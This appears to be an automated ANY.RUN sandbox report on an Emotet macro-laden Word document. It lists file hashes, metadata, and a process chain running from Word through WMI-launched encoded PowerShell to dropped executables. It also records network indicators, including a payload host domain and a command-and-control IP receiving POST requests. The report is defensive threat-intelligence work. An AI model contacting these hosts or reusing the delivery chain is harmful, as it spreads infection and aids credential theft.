File name: INC_OT6DPZ3OWF0KCV_SHK_09192019.doc
Full analysis: https://app.any.run/tasks/7c01b88e-dbe2-40ac-808d-8b1e872bcca7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: September 19, 2019, 10:39:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Triple-buffered New Hampshire, Subject: Ergonomic Wooden Car, Author: Rosina Rowe, Comments: Fall tan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 2D46AA86A46A424F66E8A72FF975BBDF
SHA1: BCCEE59D492C1A5EEEA7BC54B3F2EB03BFEFE2EE
SHA256: 47C0ADBB3E78AA5317BA38CA2DCA6182C468CECD3BC868CFCDC24D3F5434D1CA
SSDEEP: 6144:zXSY2WaPaQxUk+MclQDgQOaPLkI27NSU4jJntATfDeTPsOupth:zCY2WaPaQxUk+MclQDgQO4X27NSU4VeF

ANY.RUN is an interactive service that provides full access to the guest system. Information in this report may be distorted by user actions and is provided as is, for the user's acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 3028)
      • 572.exe (PID: 3136)
      • 572.exe (PID: 3724)
      • 572.exe (PID: 3944)
      • easywindow.exe (PID: 3952)
      • easywindow.exe (PID: 2420)
      • easywindow.exe (PID: 2880)
      • easywindow.exe (PID: 3788)
    • Emotet process was detected

      • 572.exe (PID: 3944)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2416)
    • Executed via WMI

      • powershell.exe (PID: 2416)
    • PowerShell script executed

      • powershell.exe (PID: 2416)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2416)
      • 572.exe (PID: 3944)
    • Application launched itself

      • easywindow.exe (PID: 3952)
    • Starts itself from another location

      • 572.exe (PID: 3944)
    • Connects to server without host name

      • easywindow.exe (PID: 3788)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3528)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3528)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Triple-buffered New Hampshire
Subject: Ergonomic Wooden Car
Author: Rosina Rowe
Keywords: -
Comments: Fall tan
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 06:46:00
ModifyDate: 2019:09:19 06:46:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Raynor LLC
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Greenholt
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Total processes: 44
Monitored processes: 10
Malicious processes: 3
Suspicious processes: 3

Behavior graph

(Rendered as an interactive graph in the full report.) Processes shown, linked by "start" and "drop and start" edges: winword.exe, powershell.exe, 572.exe (four instances, one tagged #EMOTET), easywindow.exe (four instances).

Process information

PID: 3528
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INC_OT6DPZ3OWF0KCV_SHK_09192019.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2416
CMD: powershell -encod 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3724
CMD: "C:\Users\admin\572.exe"
Path: C:\Users\admin\572.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3028
CMD: "C:\Users\admin\572.exe"
Path: C:\Users\admin\572.exe
Parent process: 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3136
CMD: --fb4ffeee
Path: C:\Users\admin\572.exe
Parent process: 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3944
CMD: --fb4ffeee
Path: C:\Users\admin\572.exe
Parent process: 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3952
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2880
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2420
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3788
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 1 768
Read events: 1 277
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR9BB8.tmp.cvr
Type: -
MD5:
SHA256:
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54733B46.wmf
Type: wmf
MD5:7E0E936ED97756F5CE75968998931F2E
SHA256:7C30DDCC369AC22874F2E088CA706C72069C84250774B9DB313CA7144FADEA9E
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC44F678.wmf
Type: wmf
MD5:1C9AD3433500E8654A9948525D71C6F4
SHA256:728B3198F282E8EB2D272BE8CAC1117347783681175B55BFA06C23E2A71A4628
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AC8AF44.wmf
Type: wmf
MD5:F4DC3537E2AE811B58589DDA9A0B70CC
SHA256:A080D839526B2F4CE70EE826676973E5D3BC082DFBB2293F7461DAC5EA99444B
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$C_OT6DPZ3OWF0KCV_SHK_09192019.doc
Type: pgc
MD5:34B02D905146BD1A91A9DF7052DE1D6D
SHA256:F01C593236EED9E14069C0A4684CCFC30275AE730BBA0E84581F5436E6910981
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
Type: tlb
MD5:98A204141EC4CB175E3E91EB334EAD6C
SHA256:27C53516D16F71AD745F2CBA9F45E029CF53ACD3C20B0470A19374FEBF1DC654
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B62F228.wmf
Type: wmf
MD5:82C8EEBFBFED9423F8F171A906619040
SHA256:C5F5A13A11A3E73647B50A77094F4C4E24DCF70F19B828E433169D92BB336379
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FB7411C.wmf
Type: wmf
MD5:F84D1687F62242059901D6052216473C
SHA256:0E8337B6AAB308C579461A2D8B54FC935E8EE868CFB14E2EE81B0F6E4168F9A3
PID: 3528, Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93906ED0.wmf
Type: wmf
MD5:392AFC26B9CFAE2CE4325A4598D5A536
SHA256:35EF8B83731C9E46A3DA3847F7D13495AC548C9C99DFCB063DD81DCD2C42BAA1
HTTP(S) requests: 1
TCP/UDP connections: 2
DNS requests: 1
Threats: 0

HTTP requests

PID: 3788
Process: easywindow.exe
Method: POST
HTTP Code: -
IP: 190.18.146.70:80
URL: http://190.18.146.70/guids/
CN: AR
Type: -
Size: -
Reputation: malicious

Connections

PID: -
Process: -
IP: 190.18.146.70:80
Domain: -
ASN: CABLEVISION S.A.
CN: AR
Reputation: malicious

PID: 2416
Process: powershell.exe
IP: 104.28.19.13:443
Domain: aniventure.co.uk
ASN: Cloudflare Inc
CN: US
Reputation: shared

DNS requests

Domain: aniventure.co.uk
IP:
  • 104.28.19.13
  • 104.28.18.13
Reputation: malicious

Threats

No threats detected
No debug info